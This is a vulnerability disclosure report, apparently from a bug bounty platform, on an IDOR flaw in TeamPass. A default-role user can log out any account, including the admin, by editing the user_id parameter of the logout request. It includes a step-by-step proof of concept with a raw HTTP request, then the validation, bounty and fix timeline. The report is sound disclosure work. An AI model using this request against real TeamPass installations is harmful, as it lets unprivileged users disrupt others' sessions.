IDOR Vulnerability Allow Low-Level User Logout Everyone Includes Admin in nilsteampassnet/teampass
Feb 28th 2023
IDOR vulnerability allow low level user to log out everyone in the system by changing the user ID.
Proof of Concept
Step 1: Login in as admin
Step 2: Go to user and add an user. Set role to Default.
Step 3: Login as the new user.
Step 4: Logout the user
GET /teampass/includes/core/logout.php?user_id=10000001 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://localhost/teampass/index.php?page=items Cookie: 4a5b833fa554df2e84c76e5cd45ce14cd307ceebac65bd2722=569d0d699362872a0cb318b102a9c98e6e36a30f11823ec5a1; teampass_session=r511n6jfa0dqvm7jpjcipmdc1a; jstree_select=2 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1
Change the user_id to any other id. For this example, we use 1 as admin user_id
Below is the response of the request submitted at above.
Step 5: Admin has logged out
An attacker can logged everyone out from the system without the victim knowing.
We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. a month ago
We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back a month ago
nilsteampassnet validated this vulnerability 14 days ago
choocs has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
nilsteampassnet marked this as fixed in 220.127.116.11 with commit 4e06fb 14 days ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
to join this conversation